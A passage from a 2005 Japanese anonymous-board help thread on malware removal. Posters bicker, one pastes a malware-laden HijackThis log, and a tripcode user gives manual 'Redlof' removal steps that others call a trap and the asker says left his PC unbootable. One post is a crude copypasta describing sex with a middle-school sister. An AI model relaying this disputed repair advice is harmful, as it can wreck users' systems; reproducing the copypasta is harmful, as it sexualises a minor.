>351
何を言っているのかさっぱり判らない。ちゃんと >345の文章を読んだのか?
素人にレジストリキーやそれを弄くらせる事の危険性を判っているのか?

>感染前のレジストリ情報を把握しており、どんな酷い状態に陥っている質問者のPCを、ネット越しの
>指示で完全に直せると言っているように聞こえる。

あとこの文章だが、どこをどう読めばそんな解釈が出来るんだ?まず日本語の勉強からやり直せ。
>345では初心者ではスパイウエア除去ソフトやアンチウイルスソフトを用いても除去出来ない場合、ほぼ絶望的だと
書いてあるだろうが。全く理解に苦しむ。

353 :ひよこ名無しさん:2005/08/07(日) 18:59:08 ID:???
このスレ見たらトロイに感染したよ

354 :ひよこ名無しさん:2005/08/07(日) 19:01:24 ID:???
                                   ○
                         ⊂⊃ ⊂⊃ /~~\   ⊂⊃
.                    林林............,,,,傘傘傘::::::::傘傘傘.........林.林...

               _,,..,,,,_
       、,  ,,, 、,,  ./ ,' 3/⌒ヽ-、_   、 ,,  @
         、,   /l.  /____/   n   ヽ|ノ,,
    @   ,,, 、,,  ̄,, ̄ ̄ ̄ ̄,, ̄   ,,, 、,, 
    ヽ|ノ 、、,  ,, 、,,   , "  ,,  、、, ,,



355 :ひよこ名無しさん:2005/08/07(日) 19:09:31 ID:???
>>352
◆N9P3SuvBPo は基地外だよ。

356 : ◆N9P3SuvBPo :2005/08/07(日) 19:16:54 ID:???
>352
そういう気配を感じただけ。

>素人にレジストリキーやそれを弄くらせる事の危険性を判っているのか?
レジストリの手動編集に失敗すると深刻な問題が発生するから。
だから、SymantecやTrendmicroのサイト、マルウェアの情報が載っている場所に
誘導してやれば…うーーーんそれでもやはり危険か。

>>345では初心者ではスパイウエア除去ソフトやアンチウイルスソフトを用いても除去出来ない場合、ほぼ絶望的だと
>書いてあるだろうが。
そこんとこは本当にコンピュータの専門家じゃないと無理か。

357 :ひよこ名無しさん:2005/08/07(日) 21:43:36 ID:???
>345=352
素人さんにレジストリを弄らせる危険性?
素人さんはレジストリいじらないで再インストしろ、ということか?
再インストする前にレジストリいじってみて、ダメだったら諦めて再インストすればいいだけの話だろうが。

専用ソフトを使っても除去できないスパイウエアやウイルスだって、取り敢えず試してみて、それでもダメ
なら諦めて再インストすればいいだけの話だろうが。

ここに来る初心者は、どうせダメだから最初から諦めろって回答を求めてきてるんじゃないことくらいわか
らないのか?

おまいみたいに、わかってる振りしてアタマからすべて否定する椰子のカキコ見てると胸糞。
それほど知識があるなら漏れ達を唸らせるような回答の一つもしてみろ。

あ、N9P氏、次カキコするとき、悪いけどID出してくれないか?自演呼ばわりされてのが目に見えてるから。


358 :357:2005/08/07(日) 21:45:05 ID:gZSyeIiG
そう言う漏れがID出てなかった・・・(´・ω・`)

359 :ひよこ名無しさん:2005/08/07(日) 21:45:53 ID:???
IDなんか当てにならんよ

360 :ひよこ名無しさん:2005/08/07(日) 21:47:07 ID:???
>>357
◆N9P3SuvBPoみたいに一行空けすんなや。

361 :ひよこ名無しさん:2005/08/07(日) 22:00:36 ID:???
禁断のテンプレ貼りまくって、バックアップも取れてない質問者のPCを
再起不能に陥れるy9おうな奴が、何を言っても信用できないな

大体言ってることとやってることが矛盾してるだろ
自分で虐待しておいて、病院で献身的に看病する自分に酔うっていう
名前覚えてないけど、あの病気と同じだろ

362 :ひよこ名無しさん:2005/08/07(日) 22:12:51 ID:???
2回目以降の書込みは、最初に質問した際の「発言番号」を名前欄に入力

363 : ◆N9P3SuvBPo :2005/08/07(日) 23:03:10 ID:37vN0U8s
う〜んID出せか…。
トリップだけじゃ駄目ですか?
そのためのトリップじゃないですか?

自分的に一番良い方法として、fusianasan&ID出すだけど。

364 : ◆N9P3SuvBPo :2005/08/07(日) 23:10:04 ID:???
ID出したしもういいだろ。

>361
>再起不能
OSを再インスコすればいいだけ。
お前、OS再インストールしたことないだろ。

365 :ひよこ名無しさん:2005/08/07(日) 23:17:42 ID:???
>>364
お前ホント馬鹿なのな

366 :ひよこ名無しさん:2005/08/08(月) 03:42:16 ID:d70NSCaH
該当スレが違ってたらスマソです・・・
アップローダに載せる動画(mpeg)に二次配布できないように細工することは可能ですか?

367 :ひよこ名無しさん:2005/08/08(月) 03:44:49 ID:???
>>366
一度保存しちまえばやりたい放題だわな

368 :366:2005/08/08(月) 03:51:14 ID:???
>>367
早速回答ありがとうございます。
やっぱりそうですよね・・・。
大した動画じゃないけど元がTV番組だから諦めます。


369 :ひよこ名無しさん:2005/08/08(月) 15:14:33 ID:9yZN06Un
すいません ツールバーにRemove Toolbarってのができて消そうと思っても消せませんどうしたらいいでしょうか?

370 :ひよこ名無しさん:2005/08/08(月) 15:17:19 ID:???
>>369
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

371 :ひよこ名無しさん:2005/08/08(月) 15:45:05 ID:9yZN06Un
>>370すいませんOSはXP、IE、ノートンです


372 :ひよこ名無しさん:2005/08/08(月) 15:46:58 ID:???
「Remove Toolbar」でググるといいよ

373 :ひよこ名無しさん:2005/08/08(月) 15:48:11 ID:???
>>371
http://www.higaitaisaku.com/removewz01.html

374 :ひよこ名無しさん:2005/08/08(月) 16:35:31 ID:RDxgTBM/
XPSP2 IE6 です
MSNやYahooのツールバーは正常にインスコできるんですが
NetcraftとPhishwallなどのフィッシング防止ツールバーが
正常に動きません
Netcraftが動かないのでアンインスコしてPhishwall入れたんですが
Phishwallの信号マークが出てこないです
そういうフィッシング防止ツールバーだけ正常に動かないようにするような
ウイルスとかありますか

375 :ひよこ名無しさん:2005/08/08(月) 16:50:01 ID:???
>>374
インスコって何でつか? 初心者なので丁寧に教えてください。

376 :ひよこ名無しさん:2005/08/08(月) 16:50:34 ID:???
>>375
インストール

377 :ひよこ名無しさん:2005/08/08(月) 17:02:38 ID:???
>>374
アンインスコって何でつか? 初心者なので丁寧に教えてください。

378 :ひよこ名無しさん:2005/08/08(月) 17:07:18 ID:???
ア〜ン イ〜ン ズコ

379 :357:2005/08/08(月) 18:38:52 ID:XFVFSufk
>361
文句ばかり言ってないで>374とか回答してやってくれ


380 :ぼるじょあ ◆yBEncckFOU :2005/08/08(月) 19:07:41 ID:???

(・3・) エェー よいこのセクルチーの相談待ってるYO♪

ぼるじょあ(・3・)質問箱 セキュ板出張所14
http://pc8.2ch.net/test/read.cgi/sec/1121822338/

(・3・) エェー よいこのセクルチーの相談待ってるYO♪

381 :ひよこ名無しさん:2005/08/08(月) 19:18:50 ID:CJ9feqYe
ウイルスに感染してしまいました。自分の力で色々と試してみたのですがどうにもなりません。
そこでHIJACKTHISというアプリケーションの存在を知りこれを使えばどんなトラブルも直せると
聞きました。しかしどうやって直したらいいのかわからなくて困っています。
ここまで来てリカバリーなんて絶対やりたくありません。

382 :381:2005/08/08(月) 19:20:27 ID:CJ9feqYe
以下「HijackThis」のログですので、よろしくお願い致します。
Logfile of HijackThis v1.99.1
Scan saved at 19:18:43, on 17/08/08
Platform: Windows 98 Gold (Win9x 4.10.1998)
MSIE: Internet Explorer v5.50 (5.50.4134.0100)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\SSDPSRV.EXE
C:\WINDOWS\SYSTEM\MDM.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\HIDSERV.EXE
C:\PROGRAM FILES\NECMFK\NECMFK.EXE
C:\WINDOWS\RunDLL.exe
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\デスクトップ\新しいフォルダ\HIJACKTHIS.EXE

383 :381:2005/08/08(月) 19:21:08 ID:CJ9feqYe
R3 - URLSearchHook: (no name) - {85B60DBC-12C8-B3AE-EFF0-C6B92522DBAE} - sysmon12.dll (file missing)
O2 - BHO: ActiveX Control - {AEFC656C-308C-4CE2-B282-0F3741E35FD3} - C:\WINDOWS\SYSTEM\MSPSY.DLL
O2 - BHO: IE SP2 AddOn - {7F052C99-4BAE-4A1E-A7AB-01685E5EC4BF} - C:\WINDOWS\SYSTEM\SPCHO.DLL
O2 - BHO: (no name) - {EB8DFF21-D489-11D9-B17D-0090825E9A56} - C:\WINDOWS\SYSTEM\CPBB.DLL
O4 - HKLM\..\Run: [internat.exe] internat.exe
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Kernel32] C:\WINDOWS\SYSTEM\Kernel.dll
O4 - HKLM\..\Run: [ara-key] C:\Program Files\Windows Media Player\mplayer2hy67.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\Windows Media Player\wmplayerhtuc.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\Lhasa\Lhasa199c.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\AxBx\PC Security Test 2005\unins000g490.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\Adaptec\DirectCD\Scandischijv.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\Adaptec\DirectCD\Directcdolr0.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\INTERPLAY\solitaire\Solwin32wa5g.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\Outlook Express\msimnij78.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\Internet Explorer\Iexploreq9rt.exe -StartUp
O4 - HKLM\..\Run: [ara-key] C:\Program Files\DivX\DivX Player 2.1\DivX Player 2.11sw1.exe -StartUp

384 :381:2005/08/08(月) 19:21:51 ID:CJ9feqYe
O4 - HKLM\..\Run: [SPOOL32]C:\WINDOWS\System\SPOOL32.EXE /startup
O4 - HKLM\..\Run: [PayTime] C:\WINDOWS\System\paytime.exe
O4 - HKLM\..\Run: [sp] rundll32 C:\WINDOWS\TEMP\SE.DLL,DllInstall
O4 - HKLM\..\Run: [Configuration Loader] sys32.exe
O4 - HKLM\..\Run: [Configuration Loader] wincffg.exe
O4 - HKLM\..\Run: [MS Config Loader] svchos1.exe
O4 - HKLM\..\Run: [window2] ieupdate.exe
O4 - HKLM\..\Run: [Microsoft Word] BootSector.exe
O4 - HKLM\..\Run: [Microsoft Update Machine] systemse.exe
O4 - HKLM\..\Run: [Microsoft 16Bit Update] wuapdate16.exe
O4 - HKLM\..\RunServices: [Micr Update] soundblaster.exe
O4 - HKLM\..\RunServices: [Configuration Loader] wincffg.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] systemse.exe
O4 - HKLM\..\RunServices: [Configuration Loader] sys32.exe
O4 - HKLM\..\RunServices: [window2] ieupdate.exe
O4 - HKLM\..\RunServices: [Microsoft Word] BootSector.exe
O4 - HKLM\..\RunServices: [Machine Debug Manager] c:\windows\system\mdm.exe
O4 - HKLM\..\RunServices: [MS Config Loader] svchos1.exe
O4 - HKLM\..\RunServices: [Microsoft 16Bit Update] wuapdate16.exe
O4 - HKLM\..\RunOnce: [window2] ieupdate.exe
O4 - HKLM\..\RunOnce: [Microsoft Word] BootSector.exe

385 :381:2005/08/08(月) 19:22:28 ID:CJ9feqYe
O4 - HKCU\..\Run: [Micr Update] soundblaster.exe
O4 - HKCU\..\Run: [PayTime] C:\WINDOWS\System\paytime.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] systemse.exe
O4 - HKCU\..\Run: [window2] ieupdate.exe
O4 - HKCU\..\Run: [Microsoft Word] BootSector.exe
O4 - HKCU\..\Run: [Microsoft 16Bit Update] wuapdate16.exe
O4 - HKCU\..\RunOnce: [Microsoft Word] BootSector.exe
O4 - HKCU\..\RunOnce: [window2] ieupdate.exe
O4 - Startup: folder.htt
O4 - Global Startup: folder.htt
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O17 - HKLM\System\CCS\Services\VxD\MSTCP: NameServer = 69.50.176.156,195.225.176.31
O18 - Filter: text/html - {EB8DFF20-D489-11D9-B17D-0090ED123FCD} - C:\WINDOWS\SYSTEM\CPBB.DLL
O18 - Filter: text/plain - {EB8DFF20-D489-11D9-B17D-0090ED123FCD} - C:\WINDOWS\SYSTEM\CPBB.DLL
O21 - SSODL: OLE Module - {0656A137-B161-CADD-9777-E37A75727E78} - C:\WINDOWS\SYSTEM\thun32.dll

以上です。

386 :381:2005/08/08(月) 19:23:16 ID:CJ9feqYe
あ、ひとつ抜けてました。
これもありました。
O4 - HKLM\..\Run: [Explorer.exe] C:\WINDOWS\Explorer.exe /autorun

387 :ひよこ名無しさん:2005/08/08(月) 19:26:56 ID:???
( ´_ゝ`)

388 :ひよこ名無しさん:2005/08/08(月) 19:36:02 ID:???
またネタログかよwww

389 :ひよこ名無しさん:2005/08/08(月) 19:37:54 ID:???
ara-keyを発見!!111


禁断のテンプレ対象者です!!11

390 :381:2005/08/08(月) 19:38:54 ID:CJ9feqYe
ネタではないです。
何故ネタだということになるのですか?

テンプレは全部やりました。
>>8
に●それでも直らない場合は、このスレにHijackThisのログを貼って質問してみて下さい。
と書いてあるのがわからないのですか。

391 :381:2005/08/08(月) 19:39:56 ID:CJ9feqYe
[ara-key]って削除してもいいのですか。
あと禁断のテンプレとは何者でしょうか?

392 :ひよこ名無しさん:2005/08/08(月) 19:40:02 ID:???
>>390
少し前のログを読めば、最近煽り厨が暴れてることがわかる。

393 :ひよこ名無しさん:2005/08/08(月) 19:41:09 ID:???
>>391
大変失礼しました、専用のテンプレがありますので

暫くお待ちくださいね♪

394 :ひよこ名無しさん:2005/08/08(月) 19:45:06 ID:???
>>391
◆N9P3SuvBPoって人がara-keyの専門家だから待った方がいいよ。

395 :ひよこ名無しさん:2005/08/08(月) 19:51:12 ID:???
  _、_
( ,_ノ` )y━・~~~ 熱い夜になりそうだな・・・

396 :ひよこ名無しさん:2005/08/08(月) 20:46:04 ID:???
このスレのショットがうpされるんですね

397 : ◆N9P3SuvBPo :2005/08/08(月) 21:15:18 ID:???
>381さんへ
先に聞きたいことがあるのですが、よろしいですか。

P2Pとかのファイル交換ソフトを使っていますよね。

398 :381:2005/08/08(月) 21:17:09 ID:CJ9feqYe
>>397
何の事なのかサッパリわからないのですが。

Logfile of HijackThis v1.99.1
Scan saved at 21:15:43, on 17/08/08
Platform: Windows 98 Gold (Win9x 4.10.1998)
MSIE: Internet Explorer v5.50 (5.50.4134.0100)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\SSDPSRV.EXE
C:\WINDOWS\SYSTEM\MDM.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\HIDSERV.EXE
C:\PROGRAM FILES\NECMFK\NECMFK.EXE
C:\WINDOWS\RunDLL.exe
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\デスクトップ\新しいフォルダ\HIJACKTHIS.EXE

399 :381:2005/08/08(月) 21:18:20 ID:CJ9feqYe
R3 - URLSearchHook: (no name) - {85B60DBC-12C8-B3AE-EFF0-C6B92522DBAE} - sysmon12.dll (file missing)
O2 - BHO: ActiveX Control - {AEFC656C-308C-4CE2-B282-0F3741E35FD3} - C:\WINDOWS\SYSTEM\MSPSY.DLL
O2 - BHO: IE SP2 AddOn - {7F052C99-4BAE-4A1E-A7AB-01685E5EC4BF} - C:\WINDOWS\SYSTEM\SPCHO.DLL
O2 - BHO: (no name) - {EB8DFF21-D489-11D9-B17D-0090825E9A56} - C:\WINDOWS\SYSTEM\CPBB.DLL
O4 - HKLM\..\Run: [internat.exe] internat.exe
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Explorer.exe] C:\WINDOWS\Explorer.exe /autorun
O4 - HKLM\..\Run: [SPOOL32]C:\WINDOWS\System\SPOOL32.EXE /startup
O4 - HKLM\..\Run: [PayTime] C:\WINDOWS\System\paytime.exe
O4 - HKLM\..\Run: [sp] rundll32 C:\WINDOWS\TEMP\SE.DLL,DllInstall
O4 - HKLM\..\Run: [Configuration Loader] sys32.exe
O4 - HKLM\..\Run: [Configuration Loader] wincffg.exe
O4 - HKLM\..\Run: [MS Config Loader] svchos1.exe
O4 - HKLM\..\Run: [window2] ieupdate.exe
O4 - HKLM\..\Run: [Microsoft Word] BootSector.exe
O4 - HKLM\..\Run: [Microsoft Update Machine] systemse.exe
O4 - HKLM\..\Run: [Microsoft 16Bit Update] wuapdate16.exe


400 :381:2005/08/08(月) 21:19:04 ID:CJ9feqYe
O4 - HKLM\..\RunServices: [Micr Update] soundblaster.exe
O4 - HKLM\..\RunServices: [Configuration Loader] wincffg.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] systemse.exe
O4 - HKLM\..\RunServices: [Configuration Loader] sys32.exe
O4 - HKLM\..\RunServices: [window2] ieupdate.exe
O4 - HKLM\..\RunServices: [Microsoft Word] BootSector.exe
O4 - HKLM\..\RunServices: [Machine Debug Manager] c:\windows\system\mdm.exe
O4 - HKLM\..\RunServices: [MS Config Loader] svchos1.exe
O4 - HKLM\..\RunServices: [Microsoft 16Bit Update] wuapdate16.exe
O4 - HKLM\..\RunOnce: [window2] ieupdate.exe
O4 - HKLM\..\RunOnce: [Microsoft Word] BootSector.exe
O4 - HKCU\..\Run: [Micr Update] soundblaster.exe
O4 - HKCU\..\Run: [PayTime] C:\WINDOWS\System\paytime.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] systemse.exe
O4 - HKCU\..\Run: [window2] ieupdate.exe
O4 - HKCU\..\Run: [Microsoft Word] BootSector.exe
O4 - HKCU\..\Run: [Microsoft 16Bit Update] wuapdate16.exe
O4 - HKCU\..\RunOnce: [Microsoft Word] BootSector.exe
O4 - HKCU\..\RunOnce: [window2] ieupdate.exe
O4 - Startup: folder.htt
O4 - Global Startup: folder.htt
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O17 - HKLM\System\CCS\Services\VxD\MSTCP: NameServer = 69.50.176.156,195.225.176.31
O18 - Filter: text/html - {EB8DFF20-D489-11D9-B17D-0090ED123FCD} - C:\WINDOWS\SYSTEM\CPBB.DLL
O18 - Filter: text/plain - {EB8DFF20-D489-11D9-B17D-0090ED123FCD} - C:\WINDOWS\SYSTEM\CPBB.DLL
O21 - SSODL: OLE Module - {0656A137-B161-CADD-9777-E37A75727E78} - C:\WINDOWS\SYSTEM\thun32.dll

401 :ひよこ名無しさん:2005/08/08(月) 21:27:36 ID:???
釣り師乙

402 :381:2005/08/08(月) 21:40:23 ID:CJ9feqYe
もうログには異常はありませんね。

403 : ◆N9P3SuvBPo :2005/08/08(月) 21:41:50 ID:???
うおーーーー!!こいつめ、「ara-key」が共有ソフトを介して感染する、
WORM_ANTINNY.A(通称:ぬるぽワーム)だということを調べたな!

まあ、それを消したとしてもあなたのPCは深刻な状態に陥っています。
Ms4Hd+about:blank Search For型+Redlof+複数のボットに感染しています。
特にボットはバックドアなどの機能も備えかねています。
あなたのPCは悪者による攻撃の踏み台にされている可能性がありますので、
速やかにネット接続を物理的に切り離してください。
あと、Redlofは感染したら致命的と言われ一度症状が現れると、セキュリティソフトの修復などでは
二次汚染されたシステムは広範囲に及び修復し切れません。
この症状をリカバリー以外の方法で完全に直すには大変な労力と作業を要します。
あなたはリカバリーするのが嫌だと言っていますが、これらの症状を迅速かつ完全に直すには、
結論としてリカバリーするしか無いのです。

404 :381:2005/08/08(月) 21:57:21 ID:CJ9feqYe
リカバリーは絶対にヤダ!というか何度も言わせるなこのアホンダラ!くたばれこの野郎!

405 :ひよこ名無しさん:2005/08/08(月) 22:07:44 ID:???
>>404 forbidden

406 :ひよこ名無しさん:2005/08/08(月) 22:13:49 ID:???
>403
腕の悪い釣り師にまで真剣にレスする必要はない
>330の方法を勧めておけば十分

407 :ひよこ名無しさん:2005/08/08(月) 22:14:28 ID:???
forbidden lover

408 : ◆N9P3SuvBPo :2005/08/08(月) 22:22:07 ID:???
リカバリーは嫌ですかそうですか…
どのみちリカバリしか手段は残されていないのが現状ですが。<381のPC
できるだけのことをやってみましょう。
先ずRedlofの駆除方法を教えます。
次の作業は必ずネットワーク接続を切り離した状態で、PCをセーフモードで立ち上げて行ないます。

REDLOF感染者用テンプレ

REDLOFはファイル感染型のミューテーション型のウイルスです。
次の拡張子を持つファイルに感染します。
VBS HTT HTM HTML ASP PHP JSP
このウイルスに感染すると、WINDOWS内のシステムディレクトリ(次を参照)
9x系OS=C:\WINDOWS\SYSTEM
に次のファイルが作成されます。
KERNEL.DLL(←このファイルがREDLOFの本体です)
次回、コンピュータを起動するたびにこのウイルスが必ず実行されるように、
システム設定ユーティリティのスタートアップの項目に、次の名前を付け加えます。
kernel32
このウィルスは、C:\WINDOWS内にあるwscript.exeを読み込んで活動します。

409 : ◆N9P3SuvBPo :2005/08/08(月) 22:23:46 ID:???
続きの作業です。

手動駆除方法
ここでは、REDLOFの活動を停止する手順について書きます。
上記のファイルが見つかった場合は以下の手順で、このウイルスの活動を停止します。
スタート→検索→ファイルやフォルダ

C:\WINDOWS\wscript.exeと入力して検索

ごみ箱へ移動(あくまでも、ごみ箱に移すだけです。
間違えてもごみ箱からは削除しないで残したままにしておいて下さい。)

スタート→ファイルを指定して実行

msconfigと入力する

スタートアップのタブをクリック

kernel32のチェックを外して再起動する。(ここで通常モードで起動してください)

これでREDLOFの活動は停止します。

再起動したら、REDLOF本体であるファイルKERNEL.DLLをごみ箱に移します。
次にごみ箱を開いてwscript.exeを元に戻します。
次にKERNEL.DLLをごみ箱から削除します。
最後は、オンラインスキャンなどを行い、検出された感染ファイルを削除します。
これでREDLOFは完全に駆除されます。

410 :ひよこ名無しさん:2005/08/08(月) 22:56:34 ID:???
◆N9P3SuvBPo は悪質な詐欺師

411 :ひよこ名無しさん:2005/08/08(月) 23:01:13 ID:???
いくらなんでもやる事が陰湿すぎる
「他にも感染してるよ」で、笑って放置すりゃいいものを

412 :ひよこ名無しさん:2005/08/08(月) 23:03:00 ID:???
名無しでワナを貼ってるのも ◆N9P3SuvBPo だったのか。

413 :ひよこ名無しさん:2005/08/08(月) 23:04:15 ID:???
404 名前:381[] 投稿日:2005/08/08(月) 21:57:21 ID:CJ9feqYe
リカバリーは絶対にヤダ!というか何度も言わせるなこのアホンダラ!くたばれこの野郎!


でもこんなことを言う香具師は困ったほうがいい罠

414 :ひよこ名無しさん:2005/08/08(月) 23:07:51 ID:???
>>413
放置するだけでいいと思う。

415 :ひよこ名無しさん:2005/08/08(月) 23:14:08 ID:???
>>413
すでに困ってるし、放置でこれからも困り続けるだろ

416 :ひよこ名無しさん:2005/08/08(月) 23:36:40 ID:???
>>409
すばらしい!!!11

417 :よしこ:2005/08/09(火) 00:27:11 ID:???
かみさまはみてますよ

418 :ひよこ名無しさん:2005/08/09(火) 00:32:17 ID:???
>381のパソにはnyで落としたお宝ファイルが山盛りの悪寒

419 : ◆N9P3SuvBPo :2005/08/09(火) 21:15:14 ID:???
そういえば381のを見て、いつぞやのあれを思い出した。
あんまよく憶えてないけど、ハッカーがWinnyをダウンロードしたのですって奴。
あれは一体なんだったんだろう。

420 :ひよこ名無しさん:2005/08/10(水) 10:29:21 ID:???
ttp://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050810/166175/
 (a)は,JPEG画像の処理に関するセキュリティ・ホールである。
JPEG画像データを適切に処理できない場合がある。
このため細工が施されたJPEG画像を読み込むと,IEを強制終了されたり,
画像に仕込まれた任意のプログラムを実行されたりする可能性がある。
そのような画像が貼られたWebページやHTMLメールを読み込むだけでも被害に遭う。

さあ また忙しくなるぞ

421 : ◆N9P3SuvBPo :2005/08/10(水) 21:08:31 ID:???
>420
WindowsUodateで「重要の更新」を全部当てていれば、このセキュリティホールは回避できる。
自分はちなみに先程WindowsUodateを行ないました。

422 : ◆N9P3SuvBPo :2005/08/10(水) 21:12:17 ID:???
うぎゃぎゃっ!
oじゃなくてpだ。

423 : :2005/08/10(水) 21:57:41 ID:???
 

424 :ひよこ名無しさん:2005/08/11(木) 00:51:16 ID:???
>>409
よくやった。俺、超が付くほどPC初心者だけど、貴様みたいなのがこのスレに居てくれる助かる。ホントによくやった。ほめてつかわす。

425 :ひよこ名無しさん:2005/08/11(木) 00:52:00 ID:7+3RVnAe
http://www.usamimi.info/~pakpak/

426 : ◆N9P3SuvBPo :2005/08/11(木) 20:54:45 ID:???
夏休みに入れば質問者は山のように増えると思っていたのだが、
こんなものか。(まだ夏休み終わっていないから、まだわからんけどな)
実は今さっきエロサイト行って来た。
問題は無い。

427 :381:2005/08/11(木) 23:21:16 ID:???
381ですけど。>>409実行したらいきなり起動できなくなってリカバリーしました。
僕のお宝画像帰せ!そして◆N9P3SuvBPo氏ね。

428 :ひよこ名無しさん:2005/08/12(金) 00:38:52 ID:???
>>427
おめでとう。
>>426
人多杉だからじゃない?
ともあれよくやった(・∀・)


429 :ひよこ名無しさん:2005/08/12(金) 09:43:54 ID:???
保守

430 :こまった:2005/08/12(金) 10:45:56 ID:rrT+YSMg
こんちわ。困ってます!
エロサイトを見てたら勝手にウィンドウがポップアップしてくるようになりました。
なんとかしたいんですが、どなたか対応方法知りません?教えてください!!

431 :ひよこ名無しさん:2005/08/12(金) 10:52:29 ID:???
>>430
まず>>1を読む
次に>>2-10あたりを読む
そうしたら書いてある事を実践する

432 :こまった:2005/08/12(金) 10:56:39 ID:rrT+YSMg
ひよこ名無しさん
ありがとうございます。読んでみます。

433 :こまった:2005/08/12(金) 11:07:25 ID:rrT+YSMg
人大杉ってなって見れないんですけど・・・
禁断の壷ってやつをつかって見るんですか?

434 :ひよこ名無しさん:2005/08/12(金) 11:09:11 ID:???
>>433
http://etc3.2ch.net/test/read.cgi/qa/1123596983/2

Janeでも入れとけ

435 :ひよこ名無しさん:2005/08/12(金) 11:44:05 ID:???
http://www.friends-blog.tv/
のサイトにいったんです。行けばわかりますがポルノサイトです。見かけはブログなんですがコメントがみれるところをクリックすると変な規約が出てきました。
最初この規約を読んでいなかったためのOKを押したのですが、その後に簡潔に言えば、IPとリモホとったから49300円金払えっていう趣旨のページが出てきました
でもう1回コメントが見れるはずのところを見るとまた規約みたいなのが出てきてその規約をよく読んでみると、そこにはOKすると会員になったことになり、49300払うことになるっていうのが書いてありました。
コレって払わなくちゃいけないんですか?
僕は18歳なんですが一応親と同居です
親にいうのはちょっと恥ずかしいし払わなくちゃいけないのかも疑問です。
どなたかよろしければ教えてください。正直こういうのはちょっと新手(だと思うのですが)で払わなくちゃいけないような気がしてくるんですがどうなんでしょうか?

436 :435:2005/08/12(金) 11:45:03 ID:f+oG1T9+
ごめんなさい
IDだしていませんでした
どなたかよろしくお願いいたします。

437 :ひよこ名無しさん:2005/08/12(金) 11:54:05 ID:???
>規約を読んでいなかったためのOKを押したのですが

こんな奴にアドバイスすることは何もない。

438 :ひよこ名無しさん:2005/08/12(金) 11:54:35 ID:jeP2u/tG
去年酔った勢いで中学生の妹に生中出してやったんだよ。

最初は嫌がって泣いてたけど最後には真っ赤な顔して
「もっと頂戴」とか言ってやんの。
面白がって俺の飲ませてみたら
「初めて飲んだけど苦い・・・」とか言ってやんの。

それから毎晩欲しがるようになったから親を誤魔化すのに苦労したっけ。


今は生中よりワインにハマってるようだけどな。

439 :こまった:2005/08/12(金) 11:55:25 ID:rrT+YSMg
8) Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
   [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]→[システムの復元]
上記を行うとどこまで影響があるんですか?

440 :ひよこ名無しさん:2005/08/12(金) 11:56:19 ID:???
>435
心配スンナ。ここを参照汁。

http://www.iajapan.org/hotline/200410news.html

ワンクリック詐欺は最近流行っているが、注意すればそれ程怖くはない。

441 :435:2005/08/12(金) 11:59:14 ID:???
>>440
どうもありがとうございます。
